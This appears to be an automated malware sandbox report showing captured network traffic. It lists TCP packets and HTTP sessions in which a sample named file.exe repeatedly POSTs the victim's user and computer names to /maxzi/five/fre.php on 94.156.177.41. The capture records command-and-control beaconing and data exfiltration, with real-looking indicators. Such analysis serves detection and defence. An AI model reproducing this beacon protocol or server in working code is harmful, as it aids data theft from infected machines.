Nov 22, 2024 17:39:54.151843071 CET	80	49917	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:54.151906967 CET	49917	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:54.151931047 CET	49917	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:54.273216963 CET	80	49917	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:54.290039062 CET	49922	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:54.409564972 CET	80	49922	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:54.409774065 CET	49922	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:54.411840916 CET	49922	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:54.532161951 CET	80	49922	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:54.532238007 CET	49922	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:54.655554056 CET	80	49922	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:55.765755892 CET	80	49922	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:55.765846014 CET	80	49922	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:55.765985012 CET	49922	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:55.766098022 CET	49922	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:55.885986090 CET	80	49922	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:55.910949945 CET	49926	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:56.031737089 CET	80	49926	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:56.031858921 CET	49926	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:56.034006119 CET	49926	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:56.154486895 CET	80	49926	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:56.154638052 CET	49926	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:56.274411917 CET	80	49926	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:57.516748905 CET	80	49926	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:57.516896963 CET	80	49926	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:57.517014980 CET	49926	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:57.636701107 CET	80	49926	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:57.660712004 CET	49932	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:57.781261921 CET	80	49932	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:57.781424046 CET	49932	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:57.783540010 CET	49932	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:57.905011892 CET	80	49932	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:57.905220985 CET	49932	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:58.024755955 CET	80	49932	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:59.228705883 CET	80	49932	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:59.228878975 CET	49932	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:59.228926897 CET	80	49932	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:59.228987932 CET	49932	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:59.348826885 CET	80	49932	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:59.371396065 CET	49937	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:59.492074966 CET	80	49937	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:59.492219925 CET	49937	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:59.497380018 CET	49937	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:59.617477894 CET	80	49937	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:59.617554903 CET	49937	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:59.737829924 CET	80	49937	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:01.069856882 CET	80	49937	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:01.069950104 CET	80	49937	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:01.069977999 CET	49937	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:01.070010900 CET	49937	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:01.189433098 CET	80	49937	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:01.218647003 CET	49942	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:01.338296890 CET	80	49942	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:01.338401079 CET	49942	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:01.341367960 CET	49942	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:01.461124897 CET	80	49942	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:01.461226940 CET	49942	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:01.580817938 CET	80	49942	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:02.745074987 CET	80	49942	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:02.745093107 CET	80	49942	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:02.745173931 CET	49942	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:02.745208979 CET	49942	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:02.878787994 CET	49945	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:02.986093044 CET	80	49942	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:02.998406887 CET	80	49945	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:02.998523951 CET	49945	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:03.000669003 CET	49945	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:03.120337009 CET	80	49945	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:03.120404959 CET	49945	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:03.240005016 CET	80	49945	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:04.526101112 CET	80	49945	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:04.526233912 CET	80	49945	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:04.526328087 CET	49945	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:04.526328087 CET	49945	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:04.646102905 CET	80	49945	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:04.665785074 CET	49951	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:04.785433054 CET	80	49951	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:04.785701036 CET	49951	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:04.788348913 CET	49951	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:04.910341978 CET	80	49951	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:04.910449982 CET	49951	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:05.030009985 CET	80	49951	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:06.269392967 CET	80	49951	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:06.269452095 CET	80	49951	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:06.269586086 CET	49951	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:06.269684076 CET	49951	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:06.389791012 CET	80	49951	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:06.409576893 CET	49957	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:06.529684067 CET	80	49957	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:06.529804945 CET	49957	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:06.531886101 CET	49957	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:06.653244972 CET	80	49957	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:06.653373957 CET	49957	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:06.773073912 CET	80	49957	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:08.104639053 CET	80	49957	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:08.104744911 CET	80	49957	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:08.104775906 CET	49957	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:08.104819059 CET	49957	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:08.225754976 CET	80	49957	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:08.237373114 CET	49961	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:08.357147932 CET	80	49961	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:08.357280016 CET	49961	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:08.359375000 CET	49961	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:08.480283976 CET	80	49961	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:08.480379105 CET	49961	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:08.599953890 CET	80	49961	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:09.891527891 CET	80	49961	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:09.891618013 CET	80	49961	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:09.891748905 CET	49961	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:09.891750097 CET	49961	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:10.011539936 CET	80	49961	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:10.039467096 CET	49965	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:10.159194946 CET	80	49965	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:10.159285069 CET	49965	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:10.162188053 CET	49965	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:10.283293962 CET	80	49965	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:10.283380032 CET	49965	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:10.402885914 CET	80	49965	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:11.557749987 CET	80	49965	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:11.557939053 CET	49965	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:11.557984114 CET	80	49965	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:11.558062077 CET	49965	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:11.677531004 CET	80	49965	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:11.698425055 CET	49970	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:11.818003893 CET	80	49970	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:11.818142891 CET	49970	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:11.820862055 CET	49970	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:11.940304041 CET	80	49970	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:11.940390110 CET	49970	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:12.059907913 CET	80	49970	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:13.393899918 CET	80	49970	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:13.393992901 CET	80	49970	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:13.394136906 CET	49970	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:13.394186020 CET	49970	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:13.513835907 CET	80	49970	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:13.538705111 CET	49976	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:13.658473015 CET	80	49976	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:13.658709049 CET	49976	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:13.660808086 CET	49976	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:13.780323029 CET	80	49976	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:13.780404091 CET	49976	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:13.901499033 CET	80	49976	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:15.065463066 CET	80	49976	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:15.065615892 CET	80	49976	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:15.065651894 CET	49976	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:15.065686941 CET	49976	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:15.188462973 CET	80	49976	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:15.213808060 CET	49981	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:15.333775997 CET	80	49981	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:15.333883047 CET	49981	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:15.336205959 CET	49981	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:15.455688000 CET	80	49981	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:15.455771923 CET	49981	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:15.575445890 CET	80	49981	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:16.777442932 CET	80	49981	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:16.777518034 CET	80	49981	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:16.777601004 CET	49981	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:16.777636051 CET	49981	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:16.897699118 CET	80	49981	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:16.923423052 CET	49984	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:17.042998075 CET	80	49984	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:17.044049025 CET	49984	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:17.046169043 CET	49984	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:17.165817976 CET	80	49984	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:17.167830944 CET	49984	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:17.287533998 CET	80	49984	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:18.529325008 CET	80	49984	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:18.529454947 CET	49984	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:18.529480934 CET	80	49984	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:18.529545069 CET	49984	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:18.649027109 CET	80	49984	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:18.682302952 CET	49990	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:18.802068949 CET	80	49990	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:18.802206993 CET	49990	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:18.804296017 CET	49990	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:18.923772097 CET	80	49990	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:18.923856974 CET	49990	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:19.043404102 CET	80	49990	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:20.330070019 CET	80	49990	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:20.330144882 CET	80	49990	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:20.330214024 CET	49990	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:20.331954002 CET	49990	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:20.449795961 CET	80	49990	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:20.630951881 CET	49995	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:20.750711918 CET	80	49995	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:20.750821114 CET	49995	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:20.753468990 CET	49995	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:20.873039007 CET	80	49995	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:20.873101950 CET	49995	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:20.994288921 CET	80	49995	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:22.279743910 CET	80	49995	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:22.279778004 CET	80	49995	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:22.279855967 CET	49995	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:22.279881001 CET	49995	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:22.401026964 CET	80	49995	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:22.427679062 CET	50000	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:22.547498941 CET	80	50000	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:22.547760010 CET	50000	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:22.549735069 CET	50000	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:22.672595978 CET	80	50000	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:22.672655106 CET	50000	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:40:22.794616938 CET	80	50000	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:24.138025999 CET	80	50000	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:24.138267040 CET	80	50000	94.156.177.41	192.168.2.4
Nov 22, 2024 17:40:24.138359070 CET	50000	80	192.168.2.4	94.156.177.41

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:20.262320042 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 176 Connection: close
Nov 22, 2024 17:38:20.385793924 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones367706JONES-PCk0FDD42EE188E931437F4FBE2CDUov1
Nov 22, 2024 17:38:21.672959089 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:21.933479071 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 176 Connection: close
Nov 22, 2024 17:38:22.053196907 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones367706JONES-PC+0FDD42EE188E931437F4FBE2CzzS2C
Nov 22, 2024 17:38:23.332376003 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:23.543745041 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:23.667762995 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:24.937561989 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:25.299732924 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:25.419739008 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:26.772850990 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:27.059416056 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:27.183871984 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:28.639436007 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:28.914505005 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:29.035149097 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:30.444330931 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49741	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:30.724769115 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:30.844446898 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:32.251027107 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:32.538633108 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:32.663837910 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:33.940777063 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:34.211275101 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
